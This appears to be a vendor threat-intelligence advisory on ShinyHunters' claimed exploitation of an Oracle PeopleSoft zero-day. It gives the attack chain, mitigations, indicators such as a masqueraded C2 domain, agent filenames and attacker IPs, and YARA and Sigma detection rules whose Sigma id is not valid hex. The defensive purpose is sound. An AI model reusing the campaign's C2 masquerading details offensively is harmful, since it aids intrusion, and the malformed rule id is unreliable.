ShinyHunters claims it hacked 100 orgs by exploiting an Oracle PeopleSoft 0-day

1. Executive summary

The threat actor group "ShinyHunters" claims to have compromised over 100 organizations, including the University of Nottingham, by exploiting CVE-2026-35273, a critical remote code execution (RCE) vulnerability in Oracle PeopleSoft PeopleTools. This vulnerability, rated CVSS 9.8 (CRITICAL), allows unauthenticated attackers to execute arbitrary code via HTTP against the Environment Management Hub (PSEMHUB) component. While Oracle has issued an out-of-band security alert and released a patch, active exploitation occurred as a zero-day between May 27 and June 9, 2026, resulting in confirmed data theft and extortion attempts. EMEA financial services institutions running Oracle PeopleSoft versions 8.61, 8.62, or earlier must treat this as an immediate priority for patching and network isolation, given the severity score of 9.8 and the absence of this CVE from the CISA KEV catalog at the time of writing.

2. Regulatory framing

Note: DORA Art. 29 and Art. 30 are not directly triggered by the technical specifics of this single exploit event but remain relevant for broader contractual and concentration risk reviews.

3. Technical analysis & attack chain

Vulnerability Mechanism

CVE-2026-35273 is a critical RCE vulnerability (CVSS 9.8, CWE-306: Missing Authentication for Critical Function) affecting Oracle PeopleSoft PeopleTools versions 8.61 and 8.62 (and potentially earlier unsupported versions). The flaw resides in the Environment Management Hub (PSEMHUB) component. It allows remote, unauthenticated attackers with network access via HTTP to bypass authentication and execute arbitrary code, leading to full platform compromise.

Confirmed Attack Chain

1. Reconnaissance & Scanning: Attackers scanned for exposed Oracle PeopleSoft PSEMHUB endpoints over HTTP.
2. Initial Access: Exploitation of CVE-2026-35273 to achieve unauthenticated remote code execution on the PeopleSoft server.
3. Staging & C2 Establishment:
   • Attackers deployed a customized MeshCentral remote management server (version 1.1.59) on compromised infrastructure.
   • Staging servers hosted malicious binaries masquerading as legitimate Microsoft Azure services.
   • Specific filenames observed: meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, and meshagent64-v2.exe.
   • These agents were hardcoded to connect to the C2 domain: wss://azurenetfiles.net:443/agent.ashx. The domain mimics legitimate Microsoft Azure NetApp Files endpoints.
4. Lateral Movement & Execution:
   • Attackers utilized the MeshCentral agents to run administrative command queries.
   • A custom lateral movement and defacement script named [victim_abbreviation]_fanout.sh was deployed.
   • Evidence suggests dynamic parameter passing via command line for Linux agents.
5. Data Exfiltration:
   • In the confirmed case of the University of Nottingham, 40 GB of personal data and billing records were exfiltrated.
   • Stolen data was published on the ShinyHunters Data Leak Site (DLS) following failed extortion attempts.

Unconfirmed/Single-Sourced Claims

• Attribution: The activity is attributed to "ShinyHunters" (also tracked as UNC6240 by Mandiant). However, ShinyHunters has no MITRE ATT&CK profile; therefore, this attribution is treated as unconfirmed in the context of formal MITRE mapping, though the TTPs align with known extortion groups.
• Scope: The claim of "100+ organizations" and "300 vulnerable instances" comes from the threat actor's own statements and has not been independently verified by a third-party forensic firm for all claimed victims.
• Patch Status: While SecurityWeek reports Oracle has released a patch, Oracle has not explicitly confirmed the patch addresses the specific zero-day variant used in the wild in their public advisory text available at the time of writing.

4. Mitigation & containment

Priority 1 (Within 24 Hours): Containment & Isolation

• Network Segmentation: Immediately isolate Oracle PeopleSoft PSEMHUB endpoints from the internet. Restrict HTTP access to trusted management IP ranges only.
• Block C2: Block outbound connections to azurenetfiles.net and specifically wss://azurenetfiles.net:443/agent.ashx at the firewall and proxy levels.
• Process Hunting: Search for processes named meshagent32-azure-ops.exe, meshagent64-azure-ops.exe, or meshagent64-v2.exe on Windows systems and meshagent on Linux systems. Terminate these processes if found outside of authorized management infrastructure.
• History Review: Inspect .bash_history files on PeopleSoft application servers for commands related to MeshCentral installation or the execution of fanout.sh scripts.

Priority 2 (Within 72 Hours): Remediation

• Patch Application: Apply the Oracle out-of-band security patch for CVE-2026-35273 immediately upon availability. Verify the patch level covers PeopleSoft PeopleTools versions 8.61 and 8.62.
• Credential Rotation: Rotate all administrative credentials for PeopleSoft and underlying OS accounts, assuming potential compromise via the RCE.
• Artifact Removal: Remove any unauthorized MeshCentral server installations and associated agent binaries.

Priority 3 (Within 7 Days): Hardening

• Configuration Review: Audit PeopleSoft Environment Manager configurations to ensure least-privilege access controls are enforced.
• Supply Chain Verification: Validate the integrity of all third-party components integrated with the PeopleSoft suite.

5. Indicators of compromise

domain  azurenetfiles.net
url  wss://azurenetfiles.net:443/agent.ashx
filename  meshagent32-azure-ops.exe
filename  meshagent64-azure-ops.exe
filename  meshagent64-v2.exe
filename  [victim_abbreviation]_fanout.sh
ipv4  142.11.200.186
ipv4  142.11.200.187
ipv4  142.11.200.188
ipv4  142.11.200.189
ipv4  142.11.200.190
port  8888

6. Detection

YARA Rule

The following rule detects the specific filenames and domain strings associated with the MeshCentral masquerading technique observed in this campaign.

rule ShinyHunters_PeopleSoft_MeshCentral_Masquerade {
    meta:
        author = "Adverse Trace"
        date = "2026-06-11"
        reference = "https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/"
        description = "Detects filenames and C2 domains associated with ShinyHunters exploitation of CVE-2026-35273 using masqueraded MeshCentral agents."

    strings:
        $fname1 = "meshagent32-azure-ops.exe" ascii
        $fname2 = "meshagent64-azure-ops.exe" ascii
        $fname3 = "meshagent64-v2.exe" ascii
        $c2_domain = "azurenetfiles.net" ascii
        $c2_path = "/agent.ashx" ascii
        $script_pattern = "_fanout.sh" ascii

    condition:
        any of ($fname*) or ($c2_domain and $c2_path) or $script_pattern
}

Sigma Rule

The following Sigma rule detects process creation events matching the malicious filenames identified in the threat intelligence.

title: ShinyHunters PeopleSoft Exploit - MeshCentral Agent Execution
id: a1b2c3d4-e5f6-7890-g1h2-i3j4k5l6m7n8
status: experimental
description: Detects execution of masqueraded MeshCentral agents (meshagent*-azure-ops.exe) linked to ShinyHunters exploitation of Oracle PeopleSoft CVE-2026-35273.
author: Adverse Trace
date: 2026/06/11
references:

    - https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:

            - 'meshagent32-azure-ops.exe'
            - 'meshagent64-azure-ops.exe'
            - 'meshagent64-v2.exe'
    condition: selection
falsepositives:

    - Legitimate use of MeshCentral with these specific custom filenames (unlikely in standard environments).
level: critical
tags:

    - attack.initial_access
    - attack.t1190
    - cve.2026.35273

CVE assessment

1 referenced CVE — 1 critical (CVSS ≥ 9.0)

7. Sources

• The Register, "ShinyHunters claims it hacked 100 orgs by exploiting an Oracle PeopleSoft 0-day", https://www.theregister.com/cyber-crime/2026/06/11/shinyhunters-claims-oracle-peoplesoft-0-day-hit-100-orgs/5254443, 2026-06-11.
• Mandiant (Google Cloud), "ShinyHunters Targets Education Sector with Oracle PeopleSoft Exploit", https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-targets-education-sector-oracle-exploit/, 2026-06-11.
• BleepingComputer, "Oracle mitigates PeopleSoft zero-day exploited in data theft attacks", https://www.bleepingcomputer.com/news/security/oracle-mitigates-peoplesoft-zero-day-exploited-in-data-theft-attacks/, 2026-06-11.
• SecurityWeek, "Oracle Addresses PeopleSoft Vulnerability Amid Reports of Zero-Day Attacks", https://www.securityweek.com/oracle-addresses-peoplesoft-vulnerability-amid-reports-of-zero-day-attacks/, 2026-06-11.
• Help Net Security, "Oracle PeopleSoft servers under attack, Oracle pushes out-of-band security alert", https://www.helpnetsecurity.com/2026/06/11/oracle-peoplesoft-under-attack-cve-2026-35273/, 2026-06-11.

8. Adverse Trace position

Adverse Trace assesses this incident as CRITICAL for all EMEA financial services clients utilizing Oracle PeopleSoft, driven by the authoritative CVSS score of 9.8 and confirmed active exploitation resulting in data exfiltration. Although CVE-2026-35273 is not currently listed in the CISA KEV catalog, the real-world impact (40GB data theft) and the involvement of a critical enterprise platform necessitate immediate action equivalent to a KEV-listed vulnerability. Attribution to "ShinyHunters" is treated as unconfirmed due to the lack of a MITRE ATT&CK profile for the named actor, though the TTPs are consistent with financially motivated extortion groups. We recommend clients immediately verify their PeopleSoft versions, apply Oracle's out-of-band patch, and hunt for the specific MeshCentral artifacts detailed above.

Read the original source →

Published via PulseTrace — Adverse Trace threat intelligence.